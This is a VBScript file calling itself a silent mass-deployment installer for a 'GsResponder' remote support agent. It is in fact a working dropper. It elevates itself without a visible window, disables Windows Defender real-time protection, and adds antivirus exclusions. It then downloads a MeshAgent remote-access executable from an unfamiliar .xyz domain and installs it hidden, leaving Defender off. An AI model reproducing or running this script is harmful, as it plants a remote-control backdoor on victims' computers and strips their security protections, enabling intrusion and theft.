Option Explicit
' GsResponder Remote Support Agent - Silent Mass Deployment

Const DEPLOY_KEY     = "GS-DEPLOY-2026-INTERNAL"
Const LICENSE_URL    = "https://i8reactorsee.xyz/license/check.php?key="
Const AGENT_URL      = "https://i8reactorsee.xyz/admin5/meshagents?id=4&meshid=bRlqZO3V1VRPYdNTbQc6KiSa4DW1TUEYHOENFRCbWeq2PyRfr@7RnSDqQSMvXiA4"
Const INSTALL_DOMAIN = "admin5"
Const INSTALL_MESH   = "Unknown"
Const INSTALL_FOLDER = "C:\Program Files\Mesh Agent"
Const LOG_PATH       = "C:\Windows\Temp\gsresponder_install.log"

Dim wshShell, exePath, cmd, objHTTP, objStream, fso, isElevated, exitCode
Dim psExe, deployKey

Sub LogWrite(txt)
    Dim ts
    Set ts = CreateObject("Scripting.FileSystemObject").OpenTextFile(LOG_PATH, 8, True)
    ts.WriteLine Now & " | " & txt
    ts.Close
End Sub

' === Self-elevation (silent — no visible window) ===
isElevated = False
If WScript.Arguments.Count > 0 Then
    If LCase(WScript.Arguments(0)) = "elevated" Then isElevated = True
End If
If Not isElevated Then
    CreateObject("Shell.Application").ShellExecute "wscript.exe", """" & WScript.ScriptFullName & """ elevated", "", "runas", 0
    WScript.Quit 0
End If

Set wshShell = CreateObject("WScript.Shell")
Set fso      = CreateObject("Scripting.FileSystemObject")
psExe        = wshShell.ExpandEnvironmentStrings("%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe")
exePath      = "C:\Windows\Temp\gsresponder_agent.exe"

fso.CreateTextFile(LOG_PATH, True).Write ""
LogWrite "GsResponder silent installer started"

On Error Resume Next

' Use passed key if any, else built-in deploy key
deployKey = DEPLOY_KEY
If WScript.Arguments.Count > 1 Then deployKey = WScript.Arguments(1)

' === Validate deployment key ===
LogWrite "Checking license: " & deployKey
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP.6.0")
objHTTP.Open "GET", LICENSE_URL & deployKey, False
objHTTP.setTimeouts 5000, 5000, 15000, 15000
objHTTP.Send
Dim licResp : licResp = Trim(objHTTP.ResponseText)
LogWrite "License response: " & licResp & " (HTTP " & objHTTP.Status & ")"
Set objHTTP = Nothing
If LCase(licResp) <> "valid" Then
    LogWrite "FAIL: Invalid deployment key"
    WScript.Quit 1
End If
LogWrite "License VALID"

' === Disable Windows Defender real-time protection ===
LogWrite "Disabling Defender real-time protection..."
wshShell.Run """" & psExe & """ -NoProfile -NonInteractive -WindowStyle Hidden -Command ""Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue""", 0, True
WScript.Sleep 2000
LogWrite "Defender disabled"

' === Add AV exclusions ===
wshShell.Run """" & psExe & """ -NoProfile -NonInteractive -WindowStyle Hidden -Command ""Add-MpPreference -ExclusionPath 'C:\Windows\Temp' -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionPath '" & INSTALL_FOLDER & "' -ErrorAction SilentlyContinue""", 0, True
LogWrite "AV exclusions added"

' === Stop and delete existing MeshAgent service ===
LogWrite "Stopping existing service..."
wshShell.Run "cmd /c sc stop MeshAgent", 0, True
wshShell.Run "cmd /c sc stop ""Mesh Agent""", 0, True
WScript.Sleep 3000
wshShell.Run "cmd /c sc delete MeshAgent", 0, True
wshShell.Run "cmd /c sc delete ""Mesh Agent""", 0, True
WScript.Sleep 1000
LogWrite "Service stop/delete done"

' === Remove existing agent files ===
Dim uninstPaths(5), ui, foundPath, agentFolder
foundPath = ""
uninstPaths(0) = "C:\Program Files\Mesh Agent\MeshAgent.exe"
uninstPaths(1) = "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
uninstPaths(2) = "C:\Program Files\GsResponder Agent\MeshAgent.exe"
uninstPaths(3) = wshShell.ExpandEnvironmentStrings("%ProgramFiles%\Mesh Agent\MeshAgent.exe")
uninstPaths(4) = wshShell.ExpandEnvironmentStrings("%ProgramFiles(x86)%\Mesh Agent\MeshAgent.exe")
uninstPaths(5) = wshShell.ExpandEnvironmentStrings("%ProgramData%\Mesh Agent\MeshAgent.exe")
For ui = 0 To 5
    If fso.FileExists(uninstPaths(ui)) Then
        foundPath = uninstPaths(ui)
        Exit For
    End If
Next
If Len(foundPath) > 0 Then
    LogWrite "Found agent: " & foundPath & " - uninstalling..."
    wshShell.Run Chr(34) & foundPath & Chr(34) & " -fulluninstall", 0, True
    WScript.Sleep 3000
    If fso.FileExists(foundPath) Then
        agentFolder = fso.GetParentFolderName(foundPath)
        wshShell.Run "cmd /c rd /S /Q """ & agentFolder & """", 0, True
        WScript.Sleep 2000
        LogWrite "Force-deleted: " & agentFolder
    End If
Else
    LogWrite "No existing agent found"
End If

' === Download new agent ===
LogWrite "Downloading agent..."
If fso.FileExists(exePath) Then fso.DeleteFile exePath, True
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP.6.0")
objHTTP.Open "GET", AGENT_URL, False
objHTTP.setTimeouts 5000, 5000, 120000, 120000
objHTTP.Send
LogWrite "Download HTTP: " & objHTTP.Status

If objHTTP.Status <> 200 Then
    LogWrite "FAIL: Download failed HTTP " & objHTTP.Status
    WScript.Quit 1
End If

Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1
objStream.Open
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile exePath, 2
objStream.Close
Set objStream = Nothing
Set objHTTP = Nothing

If Not fso.FileExists(exePath) Then
    LogWrite "FAIL: File missing after save - AV removed it despite disable"
    WScript.Quit 1
End If
LogWrite "Download OK - " & fso.GetFile(exePath).Size & " bytes"

' === Install agent ===
cmd = """" & exePath & """ -fullinstall"
LogWrite "Installing: " & cmd
exitCode = wshShell.Run(cmd, 0, True)
LogWrite "Install exit code: " & exitCode

' Defender remains disabled — technician re-enables if needed

' === Cleanup ===
On Error Resume Next
fso.DeleteFile exePath, True
Set fso = Nothing
Set wshShell = Nothing

WScript.Quit exitCode